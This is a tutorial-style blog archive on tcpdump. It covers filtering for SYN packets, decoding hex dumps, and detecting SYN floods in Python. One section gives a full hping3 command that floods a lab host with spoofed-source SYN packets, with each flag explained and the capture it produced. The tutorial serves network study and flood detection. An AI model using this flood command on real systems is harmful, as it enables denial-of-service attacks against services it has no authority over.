Tag archive: tcpdump

tcpdump2

tcpdump -s0 -vvv -XX "tcp" and \(port 80 and src host 192.168.2.253\) and 'tcp[13]==2'

This command gives a detailed dump of TCP packets whose destination port is 80, whose source IP is 192.168.2.253, and that are new connection requests (SYN flag set). The output of the command is shown below.

tcpdump: listening on Internal
23:04:16.773463 192.168.2.102.2127 > host-91-93-100-7.teletektelekom.com.http: S [tcp sum ok] 1822753022:1822753022(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5180, len 48)
0x0000   4500 0030 143c 4000 7f06 6519 c0a8 0266        E..0.<@...e....f
0x0010   5b5d 6407 084f 0050 6ca5 00fe 0000 0000        []d..O.Pl.......
0x0020   7002 faf0 8f79 0000 0204 05b4 0101 0402        p....y..........
23:04:16.960148 192.168.2.102.2129 > 162-25.kokteyl.com.http: S [tcp sum ok] 4061068035:4061068035(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5314, len 48)
0x0000   4500 0030 14c2 4000 7f06 261f c0a8 0266        E..0..@...&....f
0x0010   5bbf a219 0851 0050 f20e fb03 0000 0000        [....Q.P........
0x0020   7002 faf0 d193 0000 0204 05b4 0101 0402        p...............
23:04:17.151208 192.168.2.102.2131 > ads-hl.noktamedya.com.tr.http: S [tcp sum ok] 2568001692:2568001692(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5339, len 48)
0x0000   4500 0030 14db 4000 7f06 e7cf c0a8 0266        E..0..@........f
0x0010   5e4b ddc3 0853 0050 9910 989c 0000 0000        ^K...S.P........
0x0020   7002 faf0 4ec1 0000 0204 05b4 0101 0402        p...N...........
23:04:17.160741 192.168.2.102.2133 > ads-hl.noktamedya.com.tr.http: S [tcp sum ok] 1476480589:1476480589(0) win 64240 <mss 1460,nop,nop,sackOK> (DF) (ttl 127, id 5348, len 48)
0x0000   4500 0030 14e4 4000 7f06 e7c6 c0a8 0266        E..0..@........f
0x0010   5e4b ddc3 0855 0050 5801 4e4d 0000 0000        ^K...U.PX.NM....
0x0020   7002 faf0 da1d 0000 0204 05b4 0101 0402        p...............
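As an added example (not code from the original post), the following decodes the first hex dump above into its IP/TCP fields and applies the same test the filter 'tcp[13]==2' expresses. The packet bytes are the ones printed above; the function names and the TCP_FLAGS table are my own.

```python
import re

# Constructed from the first packet's hex dump in the post (192.168.2.102:2127 -> :80).
# As in the post, the dump begins at the IP header (no link-layer bytes in front).
DUMP = """
0x0000   4500 0030 143c 4000 7f06 6519 c0a8 0266        E..0.<@...e....f
0x0010   5b5d 6407 084f 0050 6ca5 00fe 0000 0000        []d..O.Pl.......
0x0020   7002 faf0 8f79 0000 0204 05b4 0101 0402        p....y..........
"""

TCP_FLAGS = {0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH", 0x10: "ACK", 0x20: "URG"}

def hexdump_to_bytes(dump: str) -> bytes:
    """Collect the hex words of each '0xNNNN ...' line, ignoring the ASCII gutter."""
    out = bytearray()
    for line in dump.strip().splitlines():
        for word in line.split()[1:9]:          # up to 8 words of 16 bits after the offset
            if not re.fullmatch(r"[0-9a-fA-F]{4}", word):
                break                           # reached the ASCII gutter on a short line
            out += bytes.fromhex(word)
    return bytes(out)

def summarize(pkt: bytes) -> dict:
    """Read the fields tcpdump printed straight out of the IPv4/TCP bytes."""
    ihl = (pkt[0] & 0x0F) * 4                   # IP header length in bytes (0x45 -> 20)
    if pkt[9] != 6:                             # IP protocol field: 6 = TCP
        raise ValueError("not a TCP packet")
    tcp = pkt[ihl:]
    flags = tcp[13]                             # the byte the BPF filter calls tcp[13]
    return {
        "src": ".".join(str(b) for b in pkt[12:16]),
        "dst": ".".join(str(b) for b in pkt[16:20]),
        "sport": int.from_bytes(tcp[0:2], "big"),
        "dport": int.from_bytes(tcp[2:4], "big"),
        "flags": [name for bit, name in TCP_FLAGS.items() if flags & bit],
        "bare_syn": flags == 0x02,              # exactly what 'tcp[13]==2' matches
    }

def matches_filter(pkt: bytes) -> bool:
    """Same test as the post's filter: TCP, port 80 on either side, flags == SYN only."""
    s = summarize(pkt)
    return (s["sport"] == 80 or s["dport"] == 80) and s["bare_syn"]

print(summarize(hexdump_to_bytes(DUMP)))
```

Because 'tcp[13]==2' requires the flags byte to be exactly SYN, a SYN that also carries the ECN bits (CWR/ECE) is not matched; 'tcp[tcpflags] & (tcp-syn|tcp-ack) == tcp-syn' catches those as well.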

hping and flood

root@bt:~# hping3 -d 122 -S -w 64 -p 80 10.56.90.12 --flood --rand-source
using eth0, addr: 10.56.90.15, MTU: 1500
HPING 10.56.90.12 (eth0 10.56.90.12): S set, 40 headers + 120 data bytes

--- 10.56.90.12 hping statistic ---
100 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
-d 122: 122 bytes of data
-S: SYN flag
-w 64: 64 TTL
-p 80: dst port 80
--rand-source: generate random source IPs.
--flood: use flood mode.

In flood mode, thousands of packets can be sent to the target within a few seconds. With the command above we sent SYN packets to the machine 10.56.90.12 so that each packet appears to come from a different source. The tcpdump output is below.

root@bt:/etc/network# tcpdump dst host 10.56.90.12
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:47:17.600589 IP 209.122.151.139.2406 > 10.56.90.12.www: S 1436648546:1436648668(122) win 64
17:47:17.601995 IP 178.81.255.60.2407 > 10.56.90.12.www: S 1705955575:1705955697(122) win 64
17:47:17.602201 IP 19.206.43.55.2408 > 10.56.90.12.www: S 1562290490:1562290612(122) win 64
17:47:17.602374 IP 36.189.9.197.2409 > 10.56.90.12.www: S 604641588:604641710(122) win 64
17:47:17.602530 IP 196.0.180.214.2410 > 10.56.90.12.www: S 1803770982:1803771104(122) win 64
17:47:17.602720 IP AAnnecy-551-1-17-160.w92-153.abo.wanadoo.fr.2411 > 10.56.90.12.www: S 288343201:288343323(122) win 64
17:47:17.602887 IP 120.185.180.254.2412 > 10.56.90.12.www: S 813778207:813778329(122) win 64
17:47:17.603042 IP 23.140.235.139.2413 > 10.56.90.12.www: S 656869372:656869494(122) win 64
17:47:17.603208 IP 224.9.55.23.2414 > 10.56.90.12.www: S 1015093568:1015093690(122) win 64
17:47:17.603360 IP 180.71.183.204.2415 > 10.56.90.12.www: S 1877170202:1877170324(122) win 64
17:47:17.603561 IP 162.221.67.19.2416 > 10.56.90.12.www: S 1513053936:1513054058(122) win 64
17:47:17.603716 IP 197.0.209.215.2417 > 10.56.90.12.www: S 876153697:876153819(122) win 64
17:47:17.603856 IP 125.26.125.157.adsl.dynamic.totbb.net.2418 > 10.56.90.12.www: S 843277992:843278114(122) win 64
17:47:17.604010 IP h223s10a9n47.user.nortelnetworks.com.2419 > 10.56.90.12.www: S 1567951363:1567951485(122) win 64
17:47:17.604177 IP 216-229-69-16-empty.fidnet.com.2420 > 10.56.90.12.www: S 2132378618:2132378740(122) win 64
17:47:17.604331 IP 100.183.141.52.2421 > 10.56.90.12.www: S 404964666:404964788(122) win 64
17:47:17.604482 IP 211.170.169.93.2422 > 10.56.90.12.www: S 1346133522:1346133644(122) win 64
17:47:17.604635 IP 163.242.189.52.2423 > 10.56.90.12.www: S 1804076725:1804076847(122) win 64
17:47:17.604819 IP 140.37.131.254.2424 > 10.56.90.12.www: S 99362479:99362601(122) win 64
17:47:17.604976 IP 254.154.21.43.2425 > 10.56.90.12.www: S 1266537163:1266537285(122) win 64
17:47:17.605110 IP 127.255.160.209.2426 > 10.56.90.12.www: S 2003554614:2003554736(122) win 64
17:47:17.605261 IP 178.190.187.221.2427 > 10.56.90.12.www: S 537031363:537031485(122) win 64
17:47:17.605403 IP 252.17.81.20.2428 > 10.56.90.12.www: S 1366970421:1366970543(122) win 64
^C17:47:17.605577 IP 28.81.43.5.2429 > 10.56.90.12.www: S 849389274:849389396(122) win 64

24 packets captured
16315 packets received by filter
16036 packets dropped by kernel
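Added example, not from the original post: a small detector that parses lines in the tcpdump format shown above and flags a destination that receives many bare SYNs from many distinct sources within a short window, which is what the capture above looks like from the target's side. The sample lines are copied from that capture plus one constructed ordinary SYN to another host; the thresholds are assumed values, not tcpdump or hping3 settings.

```python
import re
from collections import defaultdict

# Constructed sample: lines copied from the capture in the post plus one ordinary SYN
# to a different host (assumed, not from the post) so the report shows both outcomes.
SAMPLE = """
17:47:17.600589 IP 209.122.151.139.2406 > 10.56.90.12.www: S 1436648546:1436648668(122) win 64
17:47:17.601995 IP 178.81.255.60.2407 > 10.56.90.12.www: S 1705955575:1705955697(122) win 64
17:47:17.602201 IP 19.206.43.55.2408 > 10.56.90.12.www: S 1562290490:1562290612(122) win 64
17:47:17.602374 IP 36.189.9.197.2409 > 10.56.90.12.www: S 604641588:604641710(122) win 64
17:47:17.602720 IP AAnnecy-551-1-17-160.w92-153.abo.wanadoo.fr.2411 > 10.56.90.12.www: S 288343201:288343323(122) win 64
^C17:47:17.605577 IP 28.81.43.5.2429 > 10.56.90.12.www: S 849389274:849389396(122) win 64
17:47:18.100000 IP 10.56.90.15.40000 > 10.56.90.20.ssh: S 1:1(0) win 65535
"""

# Old-style tcpdump line: "time IP src.port > dst.port: FLAGS seq:seq(len) win N ..."
LINE = re.compile(r"^(\d\d):(\d\d):(\d\d\.\d+) IP (\S+)\.(\w+) > (\S+)\.(\w+): "
                  r"(\S+) \d+:\d+\((\d+)\) win (\d+)")

def parse(lines):
    """Turn capture lines into dicts; hostnames are kept as printed, not resolved."""
    pkts = []
    for raw in lines:
        m = LINE.match(raw.strip().removeprefix("^C"))  # "^C" is the Ctrl-C echo
        if m:
            t = int(m[1]) * 3600 + int(m[2]) * 60 + float(m[3])
            pkts.append({"t": t, "src": m[4], "dst": m[6], "dport": m[7],
                         "flags": m[8], "len": int(m[9]), "win": int(m[10])})
    return pkts

def syn_flood_report(pkts, min_syn=100, min_sources=50, window_s=1.0):
    """Per (dst, port): bare-SYN count, distinct sources, time span and a verdict.
    The thresholds are assumed starting points; tune them to the host's normal SYN rate."""
    by_dst = defaultdict(list)
    for p in pkts:
        if p["flags"] == "S":          # SYN without ACK: a new connection attempt
            by_dst[(p["dst"], p["dport"])].append(p)
    report = {}
    for key, syns in by_dst.items():
        span = max(p["t"] for p in syns) - min(p["t"] for p in syns)
        sources = {p["src"] for p in syns}
        shapes = {(p["len"], p["win"]) for p in syns}   # one size/window for all = scripted
        report[key] = {"syns": len(syns), "sources": len(sources), "span_s": round(span, 6),
                       "uniform": len(shapes) == 1,
                       "flood": len(syns) >= min_syn and len(sources) >= min_sources
                                and span <= window_s}
    return report

for key, r in syn_flood_report(parse(SAMPLE.splitlines()), min_syn=5, min_sources=5).items():
    print(key, r)
```

The capture summary above (16036 packets dropped by kernel) is itself a signal: when the capture host cannot keep up, counts taken from the capture understate the real rate, so the verdict should lean on the drop counter as well as on the parsed lines.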